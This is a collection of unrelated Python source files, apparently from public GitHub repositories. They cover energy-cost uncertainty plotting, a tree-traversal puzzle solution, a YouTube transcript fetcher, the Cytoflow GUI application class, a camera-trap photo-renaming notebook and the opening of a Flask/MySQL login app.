ax.set_ylim(0, 0.12)
plt.show()
# plt.savefig(default_case_name+'.ps')
plt.clf()
if type == 'calculation':
cap = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
tot_shifted = (np.array(CurrentCase['load_shift_tot']) - np.array(cap) * 1e-8 ) / vc * 8760 / cap # kWh * hour
print (tot_shifted)
# with open('NgCcsSoWiStNu_LS.pickle', 'rb') as handle:
# table_LS_y2019, table_LS_y2050_sub0, table_LS_y2050_sub1, table_LS_y2050_sub2 = pickle.load(handle)
# var = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
# cap = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
# for var_idx in range(len(var)):
# cal_plot(table_LS_y2019[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub0[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub1[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub2[var_idx], 'stack', var[var_idx])
# with open('Cost_Uncertainty_Transient_ensemble.pickle', 'rb') as handle:
# table_transient_2050 = pickle.load(handle)
# system_cost_lockin = []
# for idx in range(len(table_transient_2050)):
# system_cost_lockin.append(table_transient_2050[idx]['system_cost'][0])
# system_cost_lockin = np.array(system_cost_lockin)
# with open('Cost_Uncertainty_Scenario2050.pickle', 'rb') as handle:
# Table_scenario2050_Full = pickle.load(handle)
# system_cost = Table_scenario2050_Full[0]['system_cost']
# print (np.mean(system_cost_lockin), np.std(system_cost_lockin))
# print (np.mean(system_cost), np.std(system_cost))
# plt.scatter(np.ones(729)*1, system_cost_lockin)
# plt.scatter(np.ones(729)*2, system_cost)
# plt.xlim(0, 3)
# plt.show()
# plt.clf()
# """
"""
def plot_box(ax, pos, list_exist):
if len(list_exist)>0:
min_bound = np.min(np.array(list_exist))
max_bound = np.max(np.array(list_exist))
ax.plot( np.r_[pos-0.02, pos+0.02], np.r_[min_bound, min_bound], color='black', linewidth=0.8 )
ax.plot( np.r_[pos-0.02, pos+0.02], np.r_[max_bound, max_bound], color='black', linewidth=0.8 )
ax.plot( np.r_[pos, pos ], np.r_[min_bound, max_bound], color='black', linewidth=0.8 )
def system_cost_distribution(table_in, name):
bin_edges = list(np.arange(0, 0.101, 0.001))
# tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
system_cost = np.array(table_in['system_cost'])
cost_tables = table_in['cost']
ax1 = plt.subplot(111)
loc = 0.1
for tech_idx in tech_list_Full:
tech_cap = np.array(table_in[tech_idx+'_cap']) + np.array(table_in[tech_idx+'_fixed_cap'])
tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
tech_fixed_cost_unique = np.unique(tech_fixed_cost)
if len(tech_fixed_cost_unique) == 1:
list_unique, list_unique_exist = [], []
for idx in range(len(tech_fixed_cost)):
list_unique.append(system_cost[idx])
if tech_cap[idx] > 0: list_unique_exist.append(system_cost[idx])
ax1.scatter(np.ones(len(list_unique))*loc+0.0, list_unique, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.0, list_unique_exist)
loc += 0.1
pass
elif len(tech_fixed_cost_unique) == 3:
list_1, list_2, list_3 = [], [], []
list_1_exist, list_2_exist, list_3_exist = [], [], []
for idx in range(len(tech_fixed_cost)):
if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]:
list_1.append(system_cost[idx])
if tech_cap[idx] > 0:
list_1_exist.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]:
list_2.append(system_cost[idx])
if tech_cap[idx] > 0:
list_2_exist.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]:
list_3.append(system_cost[idx])
if tech_cap[idx] > 0:
list_3_exist.append(system_cost[idx])
ax1.scatter(np.ones(len(list_1))*loc+0.0, list_1, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.0, list_1_exist)
ax1.scatter(np.ones(len(list_2))*loc+0.1, list_2, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.1, list_2_exist)
ax1.scatter(np.ones(len(list_3))*loc+0.2, list_3, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.2, list_3_exist)
loc = loc + 0.3
system_cost_min = np.min(system_cost)
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min, system_cost_min], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.05, system_cost_min*1.05], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.1, system_cost_min*1.1], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.2, system_cost_min*1.2], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.5, system_cost_min*1.5], color='black', linewidth=0.8, linestyle='--')
ax1.set_xlim(0.0, loc)
ax1.set_ylim(0.05, 0.12)
ax1.set_xticks(np.arange(0, loc, 0.1))
# plt.show()
plt.savefig(name + '_sc.ps')
plt.clf()
# """
# """
def system_cost_distribution_PDF(table_in):
tech_list_Full = ['natgas_ccs', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
system_cost = np.array(table_in['system_cost'])
cost_tables = table_in['cost']
for tech_idx in tech_list_Full:
tech_cap = np.array(table_in[tech_idx+'_cap']) + np.array(table_in[tech_idx+'_fixed_cap'])
tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
tech_fixed_cost_unique = np.unique(tech_fixed_cost)
if len(tech_fixed_cost_unique) == 3:
list_1, list_2, list_3 = [], [], []
caps_1, caps_2, caps_3 = [], [], []
for idx in range(len(tech_fixed_cost)):
if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]: list_1.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]: list_2.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]: list_3.append(system_cost[idx])
# Distribution of costs
ax1 = plt.subplot(111)
x_axis = np.arange(0.05, 0.111, 0.001)
try:
kde_L = st.gaussian_kde(list_1); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_L.pdf(x_axis)*0.001, facecolor='#fdf289', edgecolor='#fdf289', linestyle='--', linewidth=0.8, alpha=0.5, label='L')
except:
print ('no L')
try:
kde_M = st.gaussian_kde(list_2); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_M.pdf(x_axis)*0.001, facecolor='#46edc8', edgecolor='#46edc8', linestyle='--', linewidth=0.8, alpha=0.5, label='M')
except:
print ('no M')
try:
kde_H = st.gaussian_kde(list_3); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_H.pdf(x_axis)*0.001, facecolor='#374d7c', edgecolor='#374d7c', linestyle='--', linewidth=0.8, alpha=0.5, label='H')
except:
print ('no H')
ax1.set_xlim(0.05, 0.11)
ax1.set_ylim(0, 0.15)
plt.show()
# plt.savefig(f'panel_low_{tech_idx}.ps')
plt.clf()
def system_cost_distribution_PDF_whole(table_in, name):
system_cost = np.array(table_in['system_cost'])
x_axis = np.arange(0.05, 0.111, 0.001)
ax1 = plt.subplot(111)
kde = st.gaussian_kde(system_cost)
ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde.pdf(x_axis)*0.001, facecolor='black', edgecolor='black', linestyle='--', linewidth=0.8, alpha=0.5)
ax1.set_xlim(0.05, 0.10)
ax1.set_ylim(0, 0.08)
plt.show()
# plt.savefig(f'whole{name}.ps')
plt.clf()
def cal_cap_range(table_in1, table_in2):
bin_edges = list(np.arange(0, 0.101, 0.001))
tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
# Numbers in text
system_cost1 = np.array(table_in1['system_cost'])
system_cost2 = np.array(table_in2['system_cost'])
sc1_least = np.min(system_cost1); sc1_max = np.max(system_cost1)
sc2_least = np.min(system_cost2); sc2_max = np.max(system_cost2)
print (sc2_least, sc1_least, (sc2_least-sc1_least)/sc1_least*100)
print (sc1_max)
sc1_std = np.std(system_cost1)
sc2_std = np.std(system_cost2)
print (sc2_std, sc1_std, (sc2_std-sc1_std)/sc1_std*100 )
print (sc2_max, (sc1_max-sc2_max)/sc1_max*100)
sc_50plarger = sc2_least * 1.5
sc_ensemble_50pm = system_cost2[system_cost2>sc_50plarger]
print (len(sc_ensemble_50pm)/len(system_cost2)*100)
stop
ax1 = plt.subplot(111)
loc = 1
for tech_idx in tech_list_Full:
cap_greenfield = np.array(table_in1[tech_idx+'_cap'])
cap_transients = np.array(table_in2[tech_idx+'_cap']) + np.array(table_in2[tech_idx+'_fixed_cap'])
diff = np.mean(cap_transients - cap_greenfield)
ax1.bar(loc, diff, width=0.8, color=color_colors[tech_idx])
loc += 1
ax1.plot(np.r_[0, loc], np.r_[0, 0], color='black', linewidth=0.5)
ax1.set_xlim(0, loc)
ax1.set_xticks(np.arange(1, loc, 1))
ax1.set_ylim(-0.2, 0.7)
# plt.show()
plt.savefig('change_cap.ps')
plt.clf()
with open('Cost_Uncertainty_Transient_ensemble2050.pickle', 'rb') as handle:
table_transient_2050 = pickle.load(handle)
with open('Cost_Uncertainty_Scenario2050.pickle', 'rb') as handle:
Table_scenario2050_Full = pickle.load(handle)
# with open('Cost_Uncertainty_GeoCapEnsemble.pickle', 'rb') as handle:
# Table_scenario2050_GeoCap = pickle.load(handle)
# system_cost_distribution(Table_scenario2050_Full[0], 'greeofield')
# system_cost_distribution(table_transient_2050[0], 'transient')
# system_cost_distribution_PDF(table_transient_2050[0])
# system_cost_distribution_PDF_whole(Table_scenario2050_Full[0], 'noS')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[0], 'withS07')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[1], 'withS05')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[2], 'withS03')
cal_cap_range(Table_scenario2050_Full[0], table_transient_2050[0])
# """
# # Transient new gas
# with open('Cost_Uncertainty_Transient_NewGas.pickle', 'rb') as handle:
# table_transient_NewGas = pickle.load(handle)
# initial_cap_list = []
# no_new_additions = []
# final_capacities = []
# for idx in range(729):
# natgas_cap = np.array(table_transient_NewGas[idx]['natgas_cap']).astype('float')
# natgas_ccs_cap = np.array(table_transient_NewGas[idx]['natgas_ccs_cap']).astype('float')
# natgas_fixed_cap = np.array(table_transient_NewGas[idx]['natgas_fixed_cap']).astype('float')
# natgas_ccs_fixed_cap = np.array(table_transient_NewGas[idx]['natgas_ccs_fixed_cap']).astype('float')
# total_fossil_cap = natgas_cap + natgas_ccs_cap + natgas_fixed_cap + natgas_ccs_fixed_cap
# initial_cap_list.append(total_fossil_cap[0])
# no_new_additions.append(total_fossil_cap[0]*(1-1/30)**31)
# final_capacities.append(total_fossil_cap[-1])
# diff = np.array(final_capacities) - np.array(no_new_additions)
# print (diff) | LDuan3008/MEM_CostUncertainty | Postprocess_codes/Postprocess_uncertainty.py | Postprocess_uncertainty.py | py | 32,979 | python | en | code | 0 | github-code | 13 |
9940171419 | # import math, heapq, bisect, itertools, functools
# from collections import deque, Counter, defaultdict, OrderedDict
# python sample.py < input.txt
if __name__ == '__main__':
n = int(input())
A = [[] for _ in range(n)]
for _ in range(n-1):
u, v = [int(i)-1 for i in input().split()]
A[u].append(v)
A[v].append(u)
# print(A)
ans = []
# def bfs(node, parent, level):
# global ans, A
# if level % 3 == 1:
# ans.append(len(A[node]))
# for child in A[node]:
# if child == parent:
# continue
# bfs(child, node, level + 1)
level = 0
vis = [False] * n
cur = []
for i in range(n):
if len(A[i]) == 1:
vis[i] = True
cur.append(i)
break
while cur:
nxt = []
for node in cur:
if level % 3 == 1:
ans.append(len(A[node]))
for child in A[node]:
if vis[child]:
continue
vis[child] = True
nxt.append(child)
cur = nxt
level += 1
ans.sort()
for i in range(len(ans)):
print(ans[i], end=' \n'[i == len(ans)-1]) | yang-su2000/CP-Practice | 2023-05/B303e.py | B303e.py | py | 1,244 | python | en | code | 0 | github-code | 13 |
4912316824 | from youtube_transcript_api import YouTubeTranscriptApi, NoTranscriptFound
video_url = 'https://www.youtube.com/watch?v=Bb0J_2imRQc'
video_id = video_url.split("watch?v=")[-1]
try:
# Fetching the transcript
transcript = YouTubeTranscriptApi.get_transcript(video_id)
# Printing the transcript
for text in transcript:
print(text['text'])
except NoTranscriptFound:
print("No transcript found for this video.")
| marciob/youtube-text-transcript | get_text_transcript1.py | get_text_transcript1.py | py | 439 | python | en | code | 0 | github-code | 13 |
15190298330 | #!/usr/bin/env python3.4
# coding: latin-1
# (c) Massachusetts Institute of Technology 2015-2018
# (c) Brian Teague 2018-2019
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Mar 15, 2015
@author: brian
'''
import logging, io, os, pickle
from cytoflowgui.workflow import Workflow
from cytoflowgui.flow_task_pane import FlowTaskPane
from cytoflowgui.util import CallbackHandler
from envisage.ui.tasks.api import TasksApplication
from envisage.ui.tasks.tasks_application import TasksApplicationState
from pyface.api import error
from pyface.tasks.api import TaskWindowLayout
from traits.api import Bool, Instance, List, Property, Str, Any, File
logger = logging.getLogger(__name__)
from .preferences import CytoflowPreferences
def gui_handler_callback(msg, app):
app.application_error = msg
class CytoflowApplication(TasksApplication):
""" The cytoflow Tasks application.
"""
# The application's globally unique identifier.
id = 'edu.mit.synbio.cytoflow'
# The application's user-visible name.
name = 'Cytoflow'
# Override two traits from TasksApplication so we can provide defaults, below
# The default window-level layout for the application.
default_layout = List(TaskWindowLayout)
# Whether to restore the previous application-level layout when the
# applicaton is started.
always_use_default_layout = Property(Bool)
# are we debugging? at the moment, just for sending logs to the console
debug = Bool
# did we get a filename on the command line?
filename = File
# if there's an ERROR-level log message, drop it here
application_error = Str
# keep the application log in memory
application_log = Instance(io.StringIO, ())
# local process's central model
remote_process = Any
remote_connection = Any
model = Instance(Workflow)
# the shared task pane
plot_pane = Instance(FlowTaskPane)
def run(self):
# set the root logger level to DEBUG; decide what to do with each
# message on a handler-by-handler basis
logging.getLogger().setLevel(logging.DEBUG)
## send the log to STDERR
try:
console_handler = logging.StreamHandler()
console_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s:%(name)s:%(message)s"))
console_handler.setLevel(logging.DEBUG if self.debug else logging.ERROR)
logging.getLogger().addHandler(console_handler)
except:
# if there's no console, this fails
pass
## capture log in memory
mem_handler = logging.StreamHandler(self.application_log)
mem_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s:%(name)s:%(message)s"))
mem_handler.setLevel(logging.DEBUG)
logging.getLogger().addHandler(mem_handler)
## and display gui messages for exceptions
gui_handler = CallbackHandler(lambda rec, app = self: gui_handler_callback(rec.getMessage(), app))
gui_handler.setLevel(logging.ERROR)
logging.getLogger().addHandler(gui_handler)
# must redirect to the gui thread
self.on_trait_change(self.show_error, 'application_error', dispatch = 'ui')
# set up the model
self.model = Workflow(remote_connection = self.remote_connection,
debug = self.debug)
# and the shared central pane
self.plot_pane = FlowTaskPane(model = self.model)
# run the GUI
super(CytoflowApplication, self).run()
def show_error(self, error_string):
error(None, "An exception has occurred. Please report a problem from the Help menu!\n\n"
"Afterwards, may need to restart Cytoflow to continue working.\n\n"
+ error_string)
def stop(self):
super().stop()
self.model.shutdown_remote_process(self.remote_process)
preferences_helper = Instance(CytoflowPreferences)
###########################################################################
# Private interface.
###########################################################################
def _load_state(self):
"""
Loads saved application state, if possible. Overload the envisage-
defined one to fix a py3k bug and increment the TasksApplicationState
version.
"""
state = TasksApplicationState(version = 2)
filename = os.path.join(self.state_location, 'application_memento')
if os.path.exists(filename):
# Attempt to unpickle the saved application state.
try:
with open(filename, 'rb') as f:
restored_state = pickle.load(f)
if state.version == restored_state.version:
state = restored_state
# make sure the active task is the main window
state.previous_window_layouts[0].active_task = 'edu.mit.synbio.cytoflowgui.flow_task'
else:
logger.warn('Discarding outdated application layout')
except:
# If anything goes wrong, log the error and continue.
logger.exception('Had a problem restoring application layout from %s',
filename)
self._state = state
def _save_state(self):
"""
Saves the application window size, position, panel locations, etc
"""
# Grab the current window layouts.
window_layouts = [w.get_window_layout() for w in self.windows]
self._state.previous_window_layouts = window_layouts
# Attempt to pickle the application state.
filename = os.path.join(self.state_location, 'application_memento')
try:
with open(filename, 'wb') as f:
pickle.dump(self._state, f)
except Exception as e:
# If anything goes wrong, log the error and continue.
logger.exception('Had a problem saving application layout: {}'.format(str(e)))
#### Trait initializers ###################################################
def _default_layout_default(self):
active_task = self.preferences_helper.default_task
tasks = [ factory.id for factory in self.task_factories ]
return [ TaskWindowLayout(*tasks,
active_task = active_task,
size = (1280, 800)) ]
def _preferences_helper_default(self):
return CytoflowPreferences(preferences = self.preferences)
#### Trait property getter/setters ########################################
def _get_always_use_default_layout(self):
return self.preferences_helper.always_use_default_layout
| kkiwimagi/cytoflow-microscopy-kiwi | cytoflowgui/cytoflow_application.py | cytoflow_application.py | py | 7,568 | python | en | code | 0 | github-code | 13 |
17304824026 | data = [int(i) for i in input().split()]
class Node:
def __init__(self, data, i):
self.children = []
self.metadata = []
self.children_count = data[i]
i += 1
self.metadata_count = data[i]
i += 1
for _ in range(self.children_count):
self.children.append(Node(data, i))
i = self.children[-1].last_index
for _ in range(self.metadata_count):
self.metadata.append(data[i])
i += 1
self.last_index = i
self.score = None
def get_score(self):
if self.score is not None:
return self.score
if len(self.children) == 0:
return sum(self.metadata)
score = 0
for child in self.metadata:
if child > len(self.children):
continue
score += self.children[child - 1].get_score()
return score
root = Node(data, 0)
print(root.get_score())
| kameranis/advent_of_code_2018 | day_8/sol_2.py | sol_2.py | py | 959 | python | en | code | 1 | github-code | 13 |
1078216782 | #!/usr/bin/env python
# coding: utf-8
# # Renaming photos
# ## Author(s): Brian Nhan Thien Chung (UCI NATURE research technician)
# ### Created on: Friday August 28, 2020 by Brian Nhan Thien Chung
# ### Last edited on: Wednesday September 9, 2020 by Brian Nhan Thien Chung
#
# The purpose of this Jupyter Notebook is to rename photos. As a proof of concept, photos taken at Bonita Canyon will be renamed before photos from other camera locations are renamed.
#
# After a successful proof of concept, functions are generated out of the code that was used to rename photos taken at Bonita Canyon. This allows for an abstraction of the renaming process down to a single step: calling a single function to rename photos from a camera.
#
# This Jupyter Notebook reads in a csv file of re-labeled animal photos as a pandas dataframe. This notebook can rename photos from one camera at a time. It assumes that photos that the user wants to rename from a particular camera are in an unzipped folder that is in the same directory as this notebook. The location of the csv file is assumed to be in the directory titled "Species distribution analysis". If these assumptions are not met, then this notebook cannot rename photos, and the user will have to manually code out the renaming process.
#
# The notebook will compare the photos of the camera that the user wants to rename with the photos in the csv file of re-labeled animal photos. The photos will be copied, and each copied photo will have a name with the following components:
#
# (1) The original image number
#
# (2) 2-letter camera code
#
# (3) Date the photo was taken
#
# (4, optional) Species, if the photo was noted to have a species in the csv file. If not, then this element is missing.
#
# To rename photos of a particular camera, please ensure that the above assumptions are met first. Then simply call the following function: renamePhotosInCamera(). This function will then call 2 other functions. Ignore these 2 other functions unless if there is a bug and just call this function. This function takes 2 arguments in the following order:
#
# (1) Folder name of the camera whose photos the user wants to rename. Simply copy and paste the folder name in for this argument.
#
# (2) 2-letter camera code of the particular camera whose photos the user wants to rename
#
# Both arguments must have the string data type.
#
# The function does not return anything. It can only rename photos from one camera at a time. To rename multiple cameras, simply repeat the steps and follow the assumptions above: the user must ensure that each camera whose photos the user wants to rename each have a directory that is in the same directory as this notebook. The user must then call this function and put in the folder name and the 2-letter camera code as strings. Simply repeat the steps and follow the assumptions above multiple times until photos from every camera the user wants to rename had been renamed.
#
# The following folder structures are the only acceptable folder structures for this notebook:
#
# (1) overall camera folder -------> subfolders ----------> photos
#
# (2) overall camera folder -------> photos
#
# Please ensure that these folder structures are met. No other structures are acceptable in this notebook.
#
# Please ensure that there are no periods in photo names other than the period before the photo's file extension.
#
# Also, this is intended to rename very large amounts of photos. Photos from Research Park alone numbered approximately 32 gigabytes. Since this code duplicates photos, the total number of photos jumped up to 64 gigabytes after renaming. Please ensure that your machine has enough storage space to rename photos.
#
# Now, have fun!
# In[3]:
get_ipython().run_line_magic('autosave', '10')
# In[4]:
import os
import shutil
from pathlib import Path
import pandas as pd
from PIL import Image
from PIL.ExifTags import TAGS
# In[5]:
ogcwdStr = os.getcwd()
ogcwd = Path(ogcwdStr)
os.chdir(ogcwd)
dirList = os.listdir()
# print(os.getcwd())
print(dirList)
# In[6]:
overallDirectory = Path(os.path.dirname(ogcwd))
speciesDistriAnalyDir = "Species distribution analysis"
relabeledPhotosDir = overallDirectory/speciesDistriAnalyDir
relabeledPhotos = "re-labeled animal photos.csv"
relabeledPhotos = pd.read_csv(relabeledPhotosDir/relabeledPhotos)
relabeledPhotoNames = relabeledPhotos["ImageNumber"].tolist()
cameraCounts = relabeledPhotos.groupby("LocCode")["LocCode"].count()
cameraCodes = cameraCounts.index.tolist()
cameraCodes
# In[7]:
def makeRenamedDirectories(overallCameraDir: "name of camera folder"):
"""Make directories to contain renamed photos. Please copy in the name of the camera folder
in for the parameter of this function. This function returns 2 lists of subdirectory paths
(Path object) and 2 path objects: the path of overallCameraDir and the path for the renamed
version of overallCameraDir"""
overallCameraDir_renamed = overallCameraDir + " - renamed"
overallCameraDir_renamedPath = ogcwd/overallCameraDir_renamed
if os.path.exists(overallCameraDir_renamedPath) == False:
os.mkdir(overallCameraDir_renamedPath)
overallCameraDirPath = ogcwd/overallCameraDir
cameraFileAndSubdirList = os.listdir(overallCameraDirPath)
cameraSubdirList = []
for fileOrSubdirectory in cameraFileAndSubdirList:
fileOrSubdirectoryPath = overallCameraDirPath/fileOrSubdirectory
if os.path.isdir(fileOrSubdirectoryPath) and "renamed" not in fileOrSubdirectory:
cameraSubdirList.append(fileOrSubdirectory)
cameraSubdirList_renamed = []
for index in range(len(cameraSubdirList)):
subdirectory_renamed = cameraSubdirList[index] + " - renamed"
cameraSubdirList[index] = overallCameraDirPath/cameraSubdirList[index]
subdirectory_renamedPath = overallCameraDir_renamedPath/subdirectory_renamed
cameraSubdirList_renamed.append(subdirectory_renamedPath)
if os.path.exists(subdirectory_renamedPath) == False:
os.mkdir(subdirectory_renamedPath)
print(subdirectory_renamed)
return cameraSubdirList, cameraSubdirList_renamed, overallCameraDirPath, overallCameraDir_renamedPath
# In[8]:
def renamingPhotosInSingleDirectory(directoryPath, renameddirectoryPath, cameraCode: "2 letter camera code") -> None:
"""Rename photos in only a single directory. If a camera has multiple subdirectories for photos
from multiple periods, then this function needs to be called multiple times to rename every photo
in each subdirectory. If a camera has no subdirectories, then this function will rename every photo
within that camera directory"""
files = os.listdir(directoryPath)
ogImages = []
for file in files:
extension = file.split(".")[-1]
if extension.lower() == "jpg" or extension.lower() == "jpeg":
ogImages.append(file)
for OldImage in ogImages:
PILimage = Image.open(directoryPath/OldImage)
exifOldImage = PILimage.getexif()
tagsList = []
dataList = []
for tag_id in exifOldImage:
# get the tag name, instead of human unreadable tag id
tag = TAGS.get(tag_id, tag_id)
data = exifOldImage.get(tag_id)
# decode bytes
if isinstance(data, bytes):
try:
data = data.decode()
except:
print("Unicode decode error for " + OldImage + "; Should be inconsequential.")
tagsList.append(tag)
dataList.append(data)
metadata = {tagsList[index]: dataList[index] for index in range(len(tagsList))}
dateTime = metadata["DateTimeOriginal"]
dateTimeList = dateTime.split(" ")
dateComponents = dateTimeList[0].split(":")
year = dateComponents[0]
month = dateComponents[1]
day = dateComponents[2]
formattedDate = "-".join([year, month, day])
oldImageNameParts = OldImage.split(".")
oldImageName = oldImageNameParts[0]
fileExtension = "." + oldImageNameParts[1]
newImageNameList = [oldImageName, cameraCode, formattedDate]
temporaryName = "-".join(newImageNameList)
speciesList = []
for image in relabeledPhotoNames:
ogImageNameList = image.split("-")
ogImageName = ogImageNameList[0]
ogImageCameraCode = ogImageNameList[1]
ogImageDateParts = [ogImageNameList[2], ogImageNameList[3], ogImageNameList[4]]
ogImageFormattedDate = "-".join(ogImageDateParts)
if (ogImageName in oldImageName and ogImageCameraCode == cameraCode and ogImageFormattedDate == formattedDate) or (temporaryName in image):
print("The original image name on the relabeled photos csv is {}".format(ogImageName))
species = ogImageNameList[-1]
temporaryName = image
if species not in speciesList:
speciesList.append(species)
break
wildAnimals = ["bird and raccoon", "rabbit and bird",
"rabbit and coyote", "rabbit and unknown animal(s)"]
wildAnimalAndHuman = ["bird and human", "human + dog + rabbit", "rabbit and human"]
processedSpeciesList = []
for index in range(len(speciesList)):
if speciesList[index] not in wildAnimals and speciesList[index] not in wildAnimalAndHuman:
processedSpeciesList.append(speciesList[index])
elif speciesList[index] in wildAnimals and "wild animals" not in processedSpeciesList:
processedSpeciesList.append("wild animals")
elif speciesList[index] in wildAnimalAndHuman and "animal and human" not in processedSpeciesList:
processedSpeciesList.append("animal and human")
speciesList = processedSpeciesList
for species in speciesList:
speciesFolderPath = renameddirectoryPath/species
if os.path.exists(speciesFolderPath) == False:
os.mkdir(speciesFolderPath)
temporaryNameSplitted = temporaryName.split("-")
species = temporaryNameSplitted[-1]
newImageName = temporaryName + fileExtension
oldImagePath = str(directoryPath/OldImage)
miscellaneousFolderPath = renameddirectoryPath/"miscellaneous"
if os.path.exists(miscellaneousFolderPath) == False:
os.mkdir(miscellaneousFolderPath)
if species in speciesList or species in wildAnimals or species in wildAnimalAndHuman:
if species in wildAnimals:
species = "wild animals"
elif species in wildAnimalAndHuman:
species = "animal and human"
speciesFolderPath = renameddirectoryPath/species
newImagePath = str(speciesFolderPath/newImageName)
else:
newImagePath = str(miscellaneousFolderPath/newImageName)
print(newImageName)
if os.path.exists(newImagePath) == False:
shutil.copy(oldImagePath, newImagePath)
return
# In[9]:
speciesCounts = relabeledPhotos.groupby("Species")["Species"].count()
speciesCounts
# In[10]:
def renamePhotosInCamera(cameraName: "string representing name of camera folder", cameraCode: "2-letter camera code"):
"""Renames photos of a camera. This initially calls the makeRenamedDirectories() function to make
empty directories that will later hold renamed photos. It will then call
the renamingPhotosInSubdirectory() function a few times depending on how many subdirectories
are in the original camera folder."""
subdirPaths, subdir_renamedPaths, cameraPath, renamedCameraPath = makeRenamedDirectories(cameraName)
if len(subdirPaths) == 0:
renamingPhotosInSingleDirectory(cameraPath, renamedCameraPath, cameraCode)
elif len(subdirPaths) > 0:
for index in range(len(subdirPaths)):
subdirPath = subdirPaths[index]
subdir_renamedPath = subdir_renamedPaths[index]
renamingPhotosInSingleDirectory(subdirPath, subdir_renamedPath, cameraCode)
return
# In[11]:
# renamePhotosInCamera("Bonita Canyon (Under the Bridge)", "BC")
# renamePhotosInCamera("Research Park", "RP")
# renamePhotosInCamera("test camera", "AT")
# ## Research Park
# In[12]:
# renamePhotosInCamera("1_Respark_032219_040419", "RP")
# In[13]:
# renamePhotosInCamera("2_Respark_040419_042519", "RP")
# In[14]:
# renamePhotosInCamera("3_Respark_042519_050919", "RP")
# In[15]:
# renamePhotosInCamera("4_Respark_050919_052319", "RP")
# Here's some code to check the species distribution of the actual renamed photos vs the csv file of relabeled animal photos. This chunk was originally written to look at the species distribution of the actual renamed photos in Research Park, NOT the relabeled animal photos of Research Park in the csv file of relabeled animal photos. However, this chunk of code can be customized for other cameras as well. Please customize this however you see fit.
# In[16]:
# renamedFolders = []
# for directory in dirList:
# if "renamed" in directory:
# renamedFolders.append(directory)
# overallCounts = []
# for indexRenamed in range(len(renamedFolders)):
# directoryPath = ogcwd/renamedFolders[indexRenamed]
# speciesFolders = os.listdir(directoryPath)
# folderName = renamedFolders[indexRenamed]
# for indexSpecies in range(len(speciesFolders)):
# speciesFolderPath = directoryPath/speciesFolders[indexSpecies]
# speciesFolder = speciesFolders[indexSpecies]
# speciesCount = len(os.listdir(speciesFolderPath))
# entry = [folderName, speciesFolder, speciesCount]
# print(entry)
# overallCounts.append(entry)
# columnLabels = ["Photo period", "Species", "Count"]
# researchParkCounts = pd.DataFrame(data = overallCounts, columns = columnLabels)
# researchParkCounts
# counts = researchParkCounts.groupby("Species")["Count"].sum()
# counts
# In conclusion, I think that my renaming algorithm keeps similar enough species proportions despite the renaming algorithm resulting in some animal photos being misclassified as "miscellaneous", so the actual number of animal photos for certain animals are lower. This lowering is due to initial human error (just error that's not from me) from entering data into the spreadsheets that were compiled into the overall Camera_METADATA_UCI spreadsheet and then analyzed by me. The dates the CEB interns or anyone who manually reviewed photos entered into these spreadsheets were different from the dates in the actual photo.
| briannhan/machine-learning-code | Renaming photos/Renaming photos.py | Renaming photos.py | py | 14,700 | python | en | code | 0 | github-code | 13 |
14383128855 | from flask import Flask, render_template, request
from flask_mysqldb import MySQL
app = Flask(__name__)
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'xxxxxxxxxxxxxxx'
app.config['MYSQL_DB'] = 'bank'
mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def index():
return "hello ilabs geeks ! "
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == "POST":
details = request.form
firstName = details ['fname']
